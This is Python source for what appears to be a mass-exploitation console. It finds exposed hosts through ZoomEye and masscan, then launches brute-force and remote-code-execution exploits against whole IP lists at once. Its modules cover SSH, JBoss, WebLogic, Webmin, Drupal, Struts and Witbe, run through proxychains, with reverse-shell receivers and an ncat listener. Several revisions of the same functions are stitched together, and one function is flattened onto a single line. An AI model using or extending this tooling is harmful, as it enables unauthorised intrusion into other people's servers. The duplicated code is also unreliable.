def ssh_bruteforcer(session):
    '''
    Build a core.Scanner that runs ssh_bruteforce.py with a password list.

    The list is chosen from <MECROOT>/data/*.txt; the command to run is
    read from the console.  Returns None when the chosen list is not a
    regular file, otherwise the configured Scanner (100 jobs).
    '''
    colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE)
    candidates = glob.glob(core.MECROOT + "/data/*.txt")
    wordlist = console.input_check(
        "[*] Password list file to use (put them under ./data): ",
        allow_blank=False,
        choices=candidates)
    if not os.path.isfile(wordlist):
        console.print_error("[-] Password list not found")
        return None
    remote_cmd = console.input_check("[*] Command to exec: ", allow_blank=False)
    # Only the script's own options go here; the per-target argument is
    # appended by the Scanner.
    script = 'ssh_bruteforce.py'
    script_args = ["-p", wordlist, "-c", remote_cmd]
    return core.Scanner('/ssh-bruteforce/', script, script_args, 100, session)
def ssh_bruteforcer():
    '''
    Collect arguments for ssh_bruteforce.py and wrap them in ScannerArgs.

    Returns an empty list when the password list path is not a file;
    otherwise a console.ScannerArgs with 100 jobs.
    '''
    wordlist = console.input_check(
        "[*] Password list file to use: ", allow_blank=False)
    if not os.path.isfile(wordlist):
        console.print_error("[-] Password list not found")
        return []
    remote_cmd = console.input_check("[*] Command to exec: ", allow_blank=False)
    script = 'ssh_bruteforce.py'
    # NOTE: splitting the joined string means a command that contains
    # spaces reaches the script as several separate argv entries.
    script_args = (wordlist + ' ' + remote_cmd).split()
    preview = 'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(
        script, ' '.join(script_args))
    print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END,
          preview)
    return console.ScannerArgs('/ssh-bruteforce/', script, script_args, 100)
def jboss():
    '''
    Prompt for the target OS and a command, then hand both to java_payload().

    Returns None; all work happens in java_payload().
    '''
    print(colors.BLUE + '\n[*] Welcome to JBoss RCE' + colors.END)
    target_os = console.input_check("[?] Windows or Linux? [w/l]",
                                    choices=['w', 'l'])
    remote_cmd = console.input_check(
        "[?] Command to execute on the target: ", allow_blank=False)
    java_payload(target_os, remote_cmd)
def main() -> None:
    '''
    Console main loop (SessionParameters-based revision).

    Optionally lets the user pick a target list file under
    <INIT_DIR>/data, then reads commands forever and passes each one to
    execute().  Exits via sys.exit(0) on a confirmed Ctrl-C.
    '''
    answ = str(
        input(colors.CYAN + '[?] Use ip_list.txt as target list? [y/n] ' + colors.END)).strip()
    if answ.lower() == 'n':
        os.system("ls data")
        # NOTE(review): no choices= restriction here — whatever the user
        # types (including '../' segments) is joined straight into the
        # path.  Later revisions limit this to os.listdir('data').
        SessionParameters.IP_LIST = SessionParameters.INIT_DIR + '/data/' + \
            input_check(
                '[=] Choose your target IP list, eg. ip_list.txt ',
                allow_blank=False)
    while True:
        try:
            cmd = input(colors.CYAN + colors.BOLD + colors.UNDERLINE + "\nmec" + colors.END + colors.CYAN + colors.BOLD + " > " + colors.END)
            try:
                execute(cmd)
            except (KeyboardInterrupt, EOFError, SystemExit):
                # Any of these raised inside a command ends the program.
                sys.exit(0)
        except KeyboardInterrupt:
            # Ctrl-C at the prompt itself: ask for confirmation.  EOFError
            # from input() is not caught here and propagates out of main().
            try:
                answ = input("\n[?] Are you sure to exit? [y/n] ")
            except KeyboardInterrupt:
                # Second Ctrl-C: stop the proxy helper and leave at once.
                print("\n[-] Okay okay, exiting immediately...")
                check_kill_process('ss-proxy')
                sys.exit(0)
            if answ.lower() == 'y':
                check_kill_process('ss-proxy')
                sys.exit(0)
            else:
                continue
def login_and_crawl() -> None:
    '''
    Log in to ZoomEye and crawl result pages with a pool of threads.

    Reads the page count from the console, obtains a JWT via
    ZoomEyeAPI.login(), probes page 1 once to check access, then starts
    one crawler thread per page while a separate multiprocessing.Process
    shows progress for ZoomEyeAPI.OUTFILE.  Returns None in all cases.
    '''
    amnt = int(
        console.input_check(
            "[*] How many pages to crawl? (10 IPs on each page) ",
            check_type=int).strip())
    threads = []
    api = ZoomEyeAPI('conf/zoomeye.conf')
    try:
        print(colors.BLUE + '[*] Crawling fetched pages from ZoomEye...' + colors.END)
        access_token = api.login()
        headers = {
            'Authorization': 'JWT ' + access_token,
        }
    except TypeError:
        # 'JWT ' + None raises TypeError, which is how a failed login is
        # detected here.
        console.print_error('[-] Invalid access token')
        return
    # test if we have permission to zoomeye api
    # crawler() returning a non-empty value is treated as an error message.
    test_crawl = crawler(ZoomEyeAPI.QRY, 1, headers)
    if test_crawl is not None and test_crawl != '':
        console.print_error(test_crawl)
        return
    from multiprocessing import Process
    status = Process(target=progress, args=(ZoomEyeAPI.OUTFILE, ))
    status.start()
    limit = 0
    # NOTE: range(1, amnt) stops before amnt, so amnt-1 pages are queued.
    for page in range(1, int(amnt)):
        thd = threading.Thread(target=crawler, args=(
            ZoomEyeAPI.QRY,
            page,
            headers,
        ))
        threads.append(thd)
    try:
        for job in threads:
            job.setDaemon(True)
            job.start()
            # Join on the first thread and then every time limit reaches 10,
            # so roughly ten crawler threads run between sync points.
            if limit in (0, 10):
                limit = 0
                job.join()
            limit += 1
    except (EOFError, KeyboardInterrupt, SystemExit):
        status.terminate()
        return
    else:
        pass
    # stop progress monitoring when we are done
    # (daemon crawler threads still running at this point are not joined)
    status.terminate()
def witbe(session):
    '''
    Build a core.Scanner for witbe.py.

    Asks for the IP (validated with ip_check) and port of the shell
    receiver and passes them through as -l / -p with a pool size of 50.
    '''
    colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE)
    listener_host = console.input_check('[?] IP of your shell server: ',
                                        ip_check=True)
    listener_port = console.input_check('[?] and Port? ', check_type=int)
    script = 'witbe.py'
    script_args = ["-l", listener_host, "-p", listener_port]
    return core.Scanner('/witbe/', script, script_args, 50, session)
def run():
    '''
    ZoomEye entry point: read the query and search type, derive the
    output file name, then enter main().

    The output file lives under ./data.  Quote characters, ':', '!' and
    both path separators in the query are replaced with spaces and the
    remaining words joined with '-', so the query cannot contribute path
    separators to the file name.
    '''
    scrub = str.maketrans({ch: ' ' for ch in ['"', "'", ':', '!', '\\', '/']})
    try:
        ZoomEyeAPI.QRY = console.input_check("[*] Your query is: ", allow_blank=False)
        ZoomEyeAPI.SEARCH_TYPE = console.input_check(
            "[?] Search for public devices (h) or web services (w)? [h/w] ",
            choices=['h', 'w'])
        safe_name = '-'.join(ZoomEyeAPI.QRY.translate(scrub).split())
        ZoomEyeAPI.OUTFILE = './data/zoomeye-{}.txt'.format(safe_name)
        main()
    except (EOFError, KeyboardInterrupt, SystemExit):
        print('\n[*] Exiting...')
    else:
        # NOTE: this is the no-exception path, i.e. it runs after main()
        # returns normally, not on failure.
        console.debug_except()
def witbe(session):
    '''
    Build a core.Scanner for witbe.py (variant that prints a preview line).

    The listener IP is read without ip_check here, and the -l/-p pair is
    produced by splitting one space-joined string.
    '''
    print(colors.BLUE + '\n[*] Welcome to Witbe RCE' + colors.END)
    listener_host = console.input_check('[?] IP of your shell server: ')
    listener_port = console.input_check('[?] and Port? ', check_type=int)
    script = 'witbe.py'
    # NOTE: the concatenation only works if input_check returns the port
    # as text even with check_type=int — presumably it does; confirm.
    script_args = ('-l ' + listener_host + ' -p ' + listener_port).split()
    print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END,
          'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(script),
          ' '.join(script_args))
    return core.Scanner('/witbe/', script, script_args, 50, session)
def main() -> None:
    '''
    Console main loop (SESSION-based revision).

    Optionally lets the user pick a target list file from the names in
    ./data, then reads commands forever and passes each one to execute().
    Exits via sys.exit(0) on a confirmed Ctrl-C.
    '''
    answ = str(
        input(
            colors.CYAN + '[?] Use ip_list.txt as target list? [y/n] ' + colors.END)).strip()
    if answ.lower() == 'n':
        os.system("ls data")
        # choices= restricts the answer to an existing entry of ./data,
        # so the joined path cannot leave that directory.
        SESSION.ip_list = SESSION.init_dir + '/data/' + \
            input_check(
                '[=] Choose your target IP list, eg. ip_list.txt ',
                choices=os.listdir('data'))
    while True:
        try:
            cmd = input(
                colors.CYAN + colors.BOLD + colors.UNDERLINE + "\nmec" + colors.END + colors.CYAN + colors.BOLD + " > " + colors.END)
            try:
                execute(cmd)
            except (KeyboardInterrupt, EOFError, SystemExit):
                # Any of these raised inside a command ends the program.
                sys.exit(0)
        except KeyboardInterrupt:
            # Ctrl-C at the prompt: ask for confirmation.  EOFError from
            # input() is not caught here and propagates out of main().
            try:
                answ = input("\n[?] Are you sure to exit? [y/n] ")
            except KeyboardInterrupt:
                print("\n[-] Okay okay, exiting immediately...")
                check_kill_process('ss-proxy')
                sys.exit(0)
            if answ.lower() == 'y':
                check_kill_process('ss-proxy')
                sys.exit(0)
            else:
                continue
def weblogic_cve201710271(session):
    '''
    Build a core.Scanner for weblogic_cve-2017-10271.py.

    Collects the command to run and the target OS (linux/win), passed
    through as -c and -os; pool size 50.
    '''
    colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE)
    remote_cmd = console.input_check('[?] Command to execute on the target: ',
                                     allow_blank=False)
    target_os = console.input_check(
        "[?] Target OS, default to linux [linux/win]: ",
        choices=["linux", "win"])
    script = 'weblogic_cve-2017-10271.py'
    script_args = ["-c", remote_cmd, "-os", target_os]
    return core.Scanner('/weblogic/', script, script_args, 50, session)
def weblogic():
    '''
    Collect console.ScannerArgs for weblogic.py.

    Two modes: with a shell receiver (-T reverse_shell, needs receiver IP
    and port) or a single command (-T exploit -c <cmd>).  Returns an
    empty list when os_type is neither 'w' nor 'l' — presumably
    unreachable, since input_check is given choices=['w', 'l'].
    '''
    print(colors.BLUE + '\n[*] Welcome to Weblogic getshell exploit' + colors.END)
    server_port = console.input_check(
        "[?] What's the port of Welogic server? ", check_type=int)
    os_type = console.input_check(
        '[?] Windows or Linux? [w/l] ', choices=['w', 'l'])
    if console.input_check('[?] Do you need a reverse shell? [y/n] ',
                           choices=['y', 'n']) == 'y':
        shell_server = console.input_check(
            '[?] What\'s the IP of shell receiver? ',
            allow_blank=False, ip_check=True)
        port = console.input_check(
            '[?] What\'s the port of shell receiver? ', check_type=int)
        if os_type.lower() == 'w':
            custom_args = '-l {} -p {} -P {} --silent -T '.format(
                shell_server, port, server_port) +\
                'reverse_shell -os win'
            custom_args = custom_args.split()
        elif os_type.lower() == 'l':
            custom_args = '-l {} -p {} -P {} --silent -T '.format(
                shell_server, port, server_port) +\
                'reverse_shell -os linux'
            custom_args = custom_args.split()
        else:
            console.print_error('[-] Invalid input')
            return []
    else:
        cmd = console.input_check(
            '[?] What command do you want to execute on the target? ',
            allow_blank=False).strip()
        # NOTE: .split() on the formatted string means a command that
        # contains spaces becomes several argv entries after -c.
        if os_type.lower() == 'w':
            custom_args = '-P {} --silent -T exploit -c {} -os win'.format(
                server_port, cmd).split()
        elif os_type.lower() == 'l':
            custom_args = '-P {} --silent -T exploit -c {} -os linux'.format(
                server_port, cmd).split()
        else:
            # Silent failure here, unlike the branch above which prints.
            return []
    # start scanner
    exploit = 'weblogic.py'
    work_path = '/weblogic/'
    exec_path = exploit
    jobs = 100
    # waitTime = 25 # deprecated
    scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs)
    return scanner_args
def run_masscan(**kwargs):
    """
    Prompt for a port list and hand it to scan.masscan().

    Keyword Args:
        session: the current session object; must expose ``is_root``.
            The scan is refused unless the session is root, since masscan
            needs that privilege.  NOTE: a missing/None session raises
            AttributeError on the ``is_root`` access.
    """
    session = kwargs.get("session", None)
    if not session.is_root:
        console.print_error(
            "[-] Please run mec as root in order to run masscan")
        return
    port_text = console.input_check(
        "[?] What ports do you want to scan (eg. 80 443)? ")
    try:
        scan.masscan(port_text.split())
    except KeyboardInterrupt:
        console.print_warning("[-] masscan exited")
def webmin_cve_2019_15107(session):
    '''
    Build a core.Scanner for webmin.py with the command passed as -c.

    Pool size is 50.
    '''
    colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE)
    remote_cmd = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)
    script = 'webmin.py'
    return core.Scanner('/webmin/', script, ["-c", remote_cmd], 50, session)
def drupal_cve20196340(session):
    '''
    Build a core.Scanner for cve-2019-6340_cmd.py with the command as -c.

    Unlike the other launchers here this passes a sixth positional value
    (0.1) before ``session``, matching the
    ``Scanner(work_path, exec_path, custom_args, jobs, sleep_seconds, session)``
    call shape used by the console's attack() method.
    '''
    colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE)
    remote_cmd = console.input_check('[?] Command to execute on the target: ',
                                     allow_blank=False)
    script = 'cve-2019-6340_cmd.py'
    return core.Scanner('/drupal/', script, ["-c", remote_cmd], 50, 0.1, session)
def main() -> None:
    '''
    Console main loop (cmd_handler revision).

    Initialises readline completion, optionally lets the user pick a
    target list file, then reads commands forever and passes each one to
    cmd.cmd_handler().  Exits via sys.exit(0) on a confirmed Ctrl-C.
    '''
    rlinit.CMD_LIST = rlinit.readline_init(SESSION)
    answ = str(
        input(colors.CYAN + '[?] Use ip_list.txt as target list? [y/n] ' + colors.END)).strip()
    if answ.lower() == 'n':
        os.system("ls ~/.mec/data")
        # choices= limits the answer to an existing entry of
        # core.MECROOT/data.  NOTE(review): the directory listed, the
        # directory validated against and the directory joined into the
        # path are three different expressions — presumably all resolve
        # to the same place; confirm.
        SESSION.ip_list = SESSION.init_dir + '/data/' + \
            console.input_check(
                '[=] Choose your target IP list, eg. ip_list.txt ',
                choices=os.listdir(core.MECROOT + '/data'))
    while True:
        try:
            input_cmd = input(colors.CYAN + colors.BOLD + "\nmec > " + colors.END)
            try:
                cmd.cmd_handler(SESSION, input_cmd)
            except (KeyboardInterrupt, EOFError, SystemExit):
                # Any of these raised inside a command ends the program.
                sys.exit(0)
        except KeyboardInterrupt:
            # Ctrl-C at the prompt: ask for confirmation.  EOFError from
            # input() is not caught here and propagates out of main().
            try:
                answ = input("\n[?] Are you sure to exit? [y/n] ")
            except KeyboardInterrupt:
                print("\n[-] Okay okay, exiting immediately...")
                futil.check_kill_process('ss-proxy')
                sys.exit(0)
            if answ.lower() == 'y':
                futil.check_kill_process('ss-proxy')
                sys.exit(0)
            else:
                continue
def s2_045():
    '''
    Collect arguments for s2_045_cmd.py and return them as a tuple.

    Returns:
        (exploit, work_path, exec_path, custom_args, jobs) — the positional
        layout the tuple-based scanner() unpacks; jobs is fixed at 100.
    '''
    print(colors.BLUE + '\n[*] Welcome to S2-045' + colors.END)
    target_port = console.input_check(
        '[?] What\'s the port of your target server? ', check_type=int)
    script = 's2_045_cmd.py'
    # NOTE: concatenation only works if input_check hands the port back as
    # text — presumably it does; confirm.
    script_args = ('-p ' + target_port).split()
    print(
        colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END,
        'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(script),
        ' '.join(script_args))
    return (script, '/structs2/', script, script_args, 100)
def scan(self) -> None:
    '''
    Run the configured exploit script once per line of the session's
    ip_list, keeping up to self.jobs child processes in flight.

    Reads self.work_path, self.exec_path, self.custom_args, self.jobs and
    self.session (use_proxy, proxy_conf, ip_list, logfile, init_dir).
    Child stdout/stderr are appended to self.session.logfile.  Always
    ends with sys.exit() (see the note at the bottom), so it never
    returns normally to the caller.
    '''
    try:
        work_path, exec_path = self.work_path, self.exec_path
        custom_args, jobs = self.custom_args, self.jobs
    except BaseException:
        console.print_error("[-] Invalid config")
        return
    if self.session.use_proxy:
        e_args = [
            'proxychains4', '-f', self.session.proxy_conf, './' + exec_path]
    else:
        e_args = ['./' + exec_path]
    # add custom arguments for different exploits
    e_args += custom_args
    # the last argument is target host
    e_args += ['-t']
    try:
        # NOTE: target_list is never closed in this function.
        target_list = open(self.session.ip_list)
    except BaseException as exc:
        console.print_error('[-] Error occured: {}\n'.format(exc))
        console.debug_except()
        return
    try:
        os.chdir('./exploits/' + work_path)
    except FileNotFoundError:
        # Only reported — execution continues in the current directory.
        console.print_error("[-] Can't chdir to " + work_path)
        console.debug_except()
    console.print_warning(
        '\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd())
    # you might want to cancel the scan to correct some errors
    if console.input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n':
        return
    # save stdout to logfile
    try:
        logfile = open(self.session.logfile, "a+")
    except FileNotFoundError:
        # NOTE: logfile stays unbound here, so the Popen() below would
        # raise NameError.
        console.print_error("[-] Log file not found")
    # needed for the loop
    procs = []
    pool = []  # holds all processes, check if empty when finishing
    count = len(procs)
    # display help for viewing logs
    print(colors.CYAN + "[*] Use `tail -f {}` to view logs\n\n".format(self.session.logfile))
    # use progress bar
    with open(self.session.ip_list) as iplistf:
        total = len([0 for _ in iplistf])
        iplistf.close()
    pbar = tqdm.tqdm(total=total, ncols=80, desc="[*] Processing targets")
    for line in target_list:
        target_ip = line.strip()
        # mark this loop as done
        count = len(procs)
        try:
            # start and display current process
            e_args += [target_ip]
            proc = subprocess.Popen(e_args, stdout=logfile, stderr=logfile)
            procs.append(proc)
            pool.append(proc)
            pbar.set_description(
                desc="[*] Processing {}".format(target_ip))
            # continue to next target
            # NOTE: list.remove() drops the first equal element, so if a
            # custom arg happens to equal target_ip that arg is removed
            # instead of the trailing target.
            e_args.remove(target_ip)
            # process pool
            # count was taken before the append, so the pool is handled
            # once procs already held `jobs` entries (jobs+1 per round).
            if count == jobs:
                for item in procs:
                    if psutil.pid_exists(item.pid):
                        timer_proc = Process(
                            target=futil.proc_timer, args=(item, ))
                        timer_proc.start()
                    else:
                        pool.remove(item)
                procs = []
        except (EOFError, KeyboardInterrupt, SystemExit):
            console.print_error("[-] Task aborted")
            break
        except BaseException as exc:
            logfile.write("[-] Exception: " + str(exc) + "\n")
        finally:
            # check if any procs are done, remove them from pool, update progress bar
            # NOTE: removing from `pool` while iterating it skips the
            # element that follows each removed one; the next pass picks
            # them up.
            try:
                for proc in pool:
                    if proc.poll() is not None:
                        pool.remove(proc)
                        pbar.update(1)
            except BaseException:
                logfile.write("[-] Exception: " + traceback.format_exc() + "\n")
    # make sure all processes are done
    if pool:
        for proc in pool:
            try:
                proc.terminate()
                proc.wait()
            except (EOFError, KeyboardInterrupt, SystemExit):
                pass
    # close logfile, exit progress bar, and print done flag
    logfile.close()
    pbar.close()
    os.chdir(self.session.init_dir)
    console.print_success('\n[+] All done!\n')
    # this fixes #37, because when parent gets killed, all zombie children die
    sys.exit()
def start():
    '''
    Ask for a search query and a page count, then run run_search() on them.

    Returns whatever run_search() returns.
    '''
    search_query = input_check("[?] Search query: ", allow_blank=False)
    page_count = input_check("[?] Pages to crawl: ", check_type=int)
    return run_search(search_query, page_count)
def scanner(scanner_args): ''' Execute exploit against given ip list ''' # looks ugly, but since it works well, im not planning a rewrite _, work_path, exec_path, custom_args, jobs = scanner_args[0], \ scanner_args[1], scanner_args[2], scanner_args[3], scanner_args[4] if SessionParameters.USE_PROXY: e_args = [ 'proxychains4', '-q', '-f', SessionParameters.PROXY_CONF, './' + exec_path ] else: e_args = ['./' + exec_path] e_args += custom_args e_args += ['-t'] try: target_list = open(SessionParameters.IP_LIST) except BaseException as exc: console.print_error('[-] Error occured: {}\n'.format(exc)) debug_except() return os.chdir('./exploits/' + work_path) console.print_warning('\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd()) if input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n': return console.print_warning('\n[!] It might be messy, get ready!' + '\n') time.sleep(2) count = 0 tested = count rnd = 1 for line in target_list: target_ip = line.strip() progress = colors.BLUE + colors.BOLD + 'ROUND.' + \ str(rnd) + colors.END + ' ' + colors.CYAN + colors.BOLD + \ str(tested + 1) + colors.END + ' targets found\n' try: sys.stdout.write('\r' + progress) sys.stdout.flush() except KeyboardInterrupt: exit() count += 1 tested += 1 try: e_args += [target_ip] print(colors.CYAN + ' '.join(e_args) + colors.END + '\n') proc = subprocess.Popen(e_args) # continue to next target e_args.remove(target_ip) time.sleep(.1) if count == jobs or count == 0: count = 0 rnd += 1 _, _ = proc.communicate() if proc.returncode is not None: proc.kill() continue sys.stdout.flush() os.system('clear') except (EOFError, KeyboardInterrupt, SystemExit): sys.exit(1) else: console.print_error('[-] Error when running scanner') debug_except() os.system('clear') os.chdir(SessionParameters.INIT_DIR) console.print_success('\n[+] All done!\n') print(console.INTRO)
def attack() -> None:
    '''
    Handle the console's `attack` command (SessionParameters revision).

    Asks whether to use proxychains, then either dispatches one of the
    built-in launchers in ExecExp (choice 'a') or lets the user pick a
    script from list_exp(), assemble its arguments and optionally spawn a
    listener terminal (choice 'm').  Either way the result goes to
    scanner().
    '''
    if input_check('[?] Do you wish to use proxychains? [y/n] ', choices=['y', 'n']) == 'y':
        SessionParameters.USE_PROXY = True
    else:
        SessionParameters.USE_PROXY = False
    answ = input_check('\n[?] Do you wish to use\ \n\n [a] built-in exploits\ \n [m] or launch your own manually?\ \n\n[=] Your choice: ', choices=['a', 'm'])
    if answ == 'a':
        print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n')
        print(console.BUILT_IN)
        answ = input_check('[=] Your choice: ', check_type=int, choices=['0', '1', '2', '3', '4'])
        try:
            if answ == '2':
                console.print_error("\n[-] Under development")
            elif answ == '1':
                console.print_error('\n[-] Under development')
            elif answ == '0':
                scanner(ExecExp.weblogic())
            elif answ == '3':
                scanner(ExecExp.s2_045())
            elif answ == '4':
                scanner(ExecExp.witbe())
        except BaseException:
            # Also swallows KeyboardInterrupt/SystemExit raised by scanner().
            console.print_error("[-] We have an error executing exploit")
            debug_except()
    elif answ == 'm':
        print(colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can choose your own exploit\n" + colors.END)
        print(colors.CYAN + '[*] Here are available exploits:\n' + colors.END)
        for poc in list_exp():
            print(colors.BLUE + poc + colors.END)
        exploit = input_check(
            "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ",
            choices=list_exp())
        jobs = int(
            input_check("[?] How many processes each time? ", check_type=int))
        custom_args = []
        answ = input_check("[?] Do you need a reverse shell [y/n]? ", choices=['y', 'n'])
        if answ == 'y':
            # NOTE: lhost is taken with plain input() here (no ip_check);
            # lport goes through check_type=int.
            lhost = input("[*] Where do you want me to send shells? ").strip()
            lport = input_check(
                "[*] and at what port? (make sure you have access to that port) ", check_type=int)
            custom_args = ['-l', lhost, '-p', lport]
            answ = input_check(
                '[*] Do you need me to start a listener? [y/n] ', choices=['y', 'n'])
            if answ == 'y':
                print("\n[*] Spawning ncat listener in new window...\n")
                try:
                    # lport is spliced into a command string that
                    # gnome-terminal will interpret; the check_type=int
                    # validation above is what keeps that safe — if
                    # input_check does not reject non-numeric text,
                    # revisit this.
                    subprocess.Popen(args=[
                        "gnome-terminal",
                        "--command=ncat -nklvp " + lport + " -m 1000"
                    ], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                except BaseException:
                    print(colors.YELLOW + "[-] Could not launch our listener, do you have GNOME-Terminal installed?" + colors.END + '\n')
            else:
                print("[*] Okay, just make sure you receive the reverse shells\n")
        else:
            pass
        custom_args += input("[*] args for this exploit (target IP is handled already) ").strip().split()
        # Split "dir/script.py" into exec_path ("script.py") and work_path ("dir").
        exec_path = exploit.split('/')[1:]
        work_path = exploit.split('/')[:-1]
        delimtr = '/'
        exec_path = delimtr.join(exec_path)
        work_path = delimtr.join(work_path)
        delimtr = ' '
        print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END,
              'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(exec_path), delimtr.join(custom_args))
        scanner_args = (exploit, work_path, exec_path, custom_args, jobs)
        scanner(scanner_args)
    else:
        console.print_error('[-] Invalid input')
def scanner(scanner_args) -> None:
    '''
    Run an exploit script once per line of SESSION.ip_list, tracking
    children by pid with psutil (ScannerArgs revision).

    Args:
        scanner_args: object with work_path, exec_path, custom_args and
            jobs attributes (console.ScannerArgs).  Anything else makes
            the attribute access fail and the function return silently.

    Child stdout/stderr are appended to SESSION.logfile.  Ends by calling
    check_kill_process(exec_path) to reap whatever is still running.
    '''
    # looks ugly, but since it works well, im not planning a rewrite
    try:
        work_path, exec_path = scanner_args.work_path, scanner_args.exec_path
        custom_args, jobs = scanner_args.custom_args, scanner_args.jobs
    except BaseException:
        return
    if SESSION.use_proxy:
        e_args = [
            'proxychains4', '-q', '-f', SESSION.proxy_conf, './' + exec_path
        ]
    else:
        e_args = ['./' + exec_path]
    # add custom arguments for different exploits
    e_args += custom_args
    # the last argument is target host
    e_args += ['-t']
    try:
        # NOTE: target_list is never closed in this function.
        target_list = open(SESSION.ip_list)
    except BaseException as exc:
        console.print_error('[-] Error occured: {}\n'.format(exc))
        debug_except()
        return
    try:
        os.chdir('./exploits/' + work_path)
    except FileNotFoundError:
        # Only reported — execution continues in the current directory.
        console.print_error("[-] Can't chdir to " + work_path)
        debug_except()
    console.print_warning('\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd())
    # you might want to cancel the scan to correct some errors
    if input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n':
        return
    # save stdout to logfile
    try:
        logfile = open(SESSION.logfile, "a+")
    except FileNotFoundError:
        # NOTE: logfile stays unbound here; the Popen() below would raise.
        console.print_error("[-] Log file not found")
    # needed for the loop
    procs = []
    pids = []  # collects all pids, check if empty when finishing
    count = len(procs)
    # display help for viewing logs
    print(colors.CYAN + "[*] Use `tail -f {}` to view logs\n\n".format(SESSION.logfile))
    # use progress bar
    with open(SESSION.ip_list) as iplistf:
        total = len([0 for _ in iplistf])
        iplistf.close()
    pbar = tqdm.tqdm(total=total, ncols=80, desc="[*] Processing targets")
    for line in target_list:
        target_ip = line.strip()
        # mark this loop as done
        count = len(procs)
        try:
            # start and display current process
            e_args += [target_ip]
            proc = subprocess.Popen(e_args, stdout=logfile, stderr=logfile)
            procs.append(proc)
            pids.append(proc.pid)
            pbar.set_description(desc="[*] Processing {}".format(target_ip))
            # continue to next target
            # NOTE: list.remove() drops the first equal element, so a
            # custom arg equal to target_ip would be removed instead.
            e_args.remove(target_ip)
            # process pool
            # count was taken before the append, so this fires once procs
            # already held `jobs` entries (jobs+1 launches per round).
            if count == jobs:
                for item in procs:
                    if psutil.pid_exists(item.pid):
                        timer_proc = Process(target=proc_timer, args=(item, ))
                        timer_proc.start()
                    else:
                        pids.remove(item.pid)
                procs = []
        except (EOFError, KeyboardInterrupt, SystemExit):
            # killall running processes
            check_kill_process(exec_path)
            logfile.close()
            pbar.close()
            console.print_error("[-] Task aborted")
            os.chdir(SESSION.init_dir)
            return
        except BaseException as exc:
            console.print_error("[-] Exception: {}\n".format(str(exc)))
            logfile.write("[-] Exception: " + str(exc) + "\n")
        finally:
            # check if any pids are done
            # NOTE(review): a child that exited but was never wait()ed is
            # still a (zombie) pid for pid_exists — presumably proc_timer
            # takes care of reaping; confirm.  Removing from `pids` while
            # iterating it also skips the following element.
            try:
                for pid in pids:
                    if not psutil.pid_exists(pid):
                        pids.remove(pid)
                        pbar.update(1)
            except BaseException:
                pass
    # make sure all processes are done
    if pids:
        time.sleep(10)
    # kill everything thats going to be a zombie, close logfile, exit progress bar, and print done flag
    check_kill_process(exec_path)
    logfile.close()
    pbar.close()
    os.chdir(SESSION.init_dir)
    console.print_success('\n[+] All done!\n')
def attack() -> None:
    '''
    Handle the console's `attack` command (SESSION revision).

    Asks whether to use proxychains (and, if so, checks the binary exists
    and runs the `proxy` console command), then either dispatches one of
    the exploit_exec launchers (choice 'a') or lets the user pick a script
    from list_exp() and assemble its arguments (choice 'm').  The result
    is handed to scanner() as console.ScannerArgs.
    '''
    SESSION.use_proxy = input_check(
        '[?] Do you wish to use proxychains? [y/n] ', choices=['y', 'n']) == 'y'
    if SESSION.use_proxy:
        if shutil.which("proxychains4") is None:
            console.print_error("proxychains4 not found")
            return
        execute("proxy")
    answ = input_check('\n[?] Do you wish to use\ \n\n [a] built-in exploits\ \n [m] or launch your own manually?\ \n\n[=] Your choice: ', choices=['a', 'm'])
    if answ == 'a':
        print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n')
        print(console.BUILT_IN)
        answ = input_check('[=] Your choice: ', check_type=int, choices=['0', '1', '2', '3', '4'])
        try:
            # NOTE(review): the launchers return [] on bad input; scanner()
            # presumably rejects that when it reads .work_path — confirm.
            if answ == '0':
                scanner(exploit_exec.ssh_bruteforcer())
            elif answ == '1':
                scanner(exploit_exec.weblogic())
            elif answ == '2':
                console.print_error("[-] Not available")
            elif answ == '3':
                console.print_error("[-] Not available")
            elif answ == '4':
                scanner(exploit_exec.s2_045())
        except (EOFError, KeyboardInterrupt, SystemExit):
            return
    elif answ == 'm':
        print(colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can choose your own exploit\n" + colors.END)
        colored_print('[*] Here are available exploits:\n', colors.CYAN)
        for poc in list_exp():
            colored_print(poc + colors.END, colors.BLUE)
        exploit = input_check(
            "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ",
            choices=list_exp())
        jobs = int(
            input_check("[?] How many processes each time? ", check_type=int))
        custom_args = []
        answ = input_check("[?] Do you need a reverse shell [y/n]? ", choices=['y', 'n'])
        if answ == 'y':
            # Both receiver values are validated by input_check (ip_check /
            # check_type=int) before they become argv entries.
            lhost = input_check("[*] Where do you want me to send shells? ", allow_blank=False, ip_check=True)
            lport = input_check("[*] and at what port?", check_type=int)
            custom_args = ['-l', lhost, '-p', lport]
        else:
            pass
        custom_args += input_check("[*] args for this exploit: ").strip().split()
        # parse user's exploit name
        # "dir/script.py" -> exec_path "script.py", work_path "dir"
        exec_path = exploit.split('/')[1:]
        work_path = exploit.split('/')[:-1]
        exec_path = '/'.join(exec_path)
        work_path = '/'.join(work_path)
